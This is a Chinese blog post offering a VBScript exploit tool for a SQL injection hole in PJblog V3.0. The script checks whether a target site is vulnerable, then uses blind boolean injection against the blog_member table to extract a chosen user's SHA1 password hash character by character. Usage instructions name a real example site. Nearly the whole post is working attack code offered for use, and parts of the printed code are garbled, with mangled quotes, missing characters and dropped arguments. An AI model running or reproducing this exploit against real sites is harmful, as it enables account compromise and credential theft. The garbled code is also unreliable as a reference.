PJblog V3.0 0day Vbs版漏洞利用工具

漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
 

  1. If WScript.Arguments.Count <> 2 Then
  2.         WScript.Echo “Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名”
  3.         WScript.Echo “Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam”
  4.         WScript.Quit
  5. End If
  6.  
  7. attackUrl = WScript.Arguments(0)
  8. attackUser = WScript.Arguments(1)
  9. attackUrl = Replace(attackUrl,“\”,”/“)
  10. If Right(attackUrl , 1) <> “/” Then
  11.         attackUrl = attackUrl & “/
  12. End If
  13. SHA1Charset = “123456789ABCDEFJ
  14. strHoleUrl = attackUrl & “ction.asp?action=checkAlias&cname=0kee“”
  15.  
  16. If IsSuccess(strHoleUrl & “r “”1“”=“”1“) And Not IsSuccess(strHoleUrl & “and “”1“”=“”2“) Then
  17.         WScript.Echo “恭喜!存在漏洞
  18. Else
  19.         WScript.Echo “没有检测到漏洞
  20.         WScript.Quit
  21. End If
  22.  
  23. For n=1 To 40
  24.         For i=1 To 17
  25.                 strInject = strHoleUrl & “ Or 0<(Select Count(*) From blog_member Where mem_name=‘” & attackUser & “‘ And mem_password>='” & strResult & Mid(SHA1Charset, i, 1) & “‘) And “”1″”=””1″
  26.                 If Not IsSuccess(strInjectThen
  27.                         strResult = strResult & Mid(SHA1Charseti-11)
  28.                         Exit For
  29.                 End If
  30.                 strPrint = chr(13) & “Password(SHA1): “ & strResult & Mid(SHA1Charseti1)                
  31.                 WScript.StdOut.Write strPrint
  32.         Next
  33. Next
  34. WScript.Echo Chr(13) & Chr (10) & “Done!”
  35.  
  36. Function PostData(PostUrl)
  37.     Dim Http
  38.     Set Http = CreateObject(“msxml2.serverXMLHTTP”)
  39.     With Http
  40.         .Open “GET”,PostUrl,False
  41.         .Send ()
  42.         PostData = .ResponseBody
  43.     End With
  44.     Set Http = Nothing
  45.     PostData =bytes2BSTR(PostData)
  46. End Function
  47.  
  48.  
  49. Function bytes2BSTR(vIn)
  50.     Dim strReturn
  51.     Dim IThisCharCodeNextCharCode
  52.     strReturn = “”
  53.     For I = 1 To LenB(vIn)
  54.         ThisCharCode = AscB(MidB(vInI1))
  55.         If ThisCharCode < &H80 Then
  56.             strReturn = strReturn & Chr(ThisCharCode)
  57.         Else
  58.             NextCharCode = AscB(MidB(vInI + 11))
  59.             strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
  60.             I = I + 1
  61.         End If
  62.     Next
  63.     bytes2BSTR = strReturn
  64. End Function
  65.  
  66. Function IsSuccess(PostUrl)
  67.  
  68. strData = PostData(PostUrl)
  69. ‘Wscript.Echo strData
  70. if InStr(strData,“check_error”) >0 then
  71.         IsSuccess = True
  72. Else
  73.         IsSuccess = False
  74. End If
  75. ‘Wscript.Sleep 500 ‘让系统休息一下
  76. End Function
  77.  
  78.  
  79.  
  80.  

用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名

from:http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>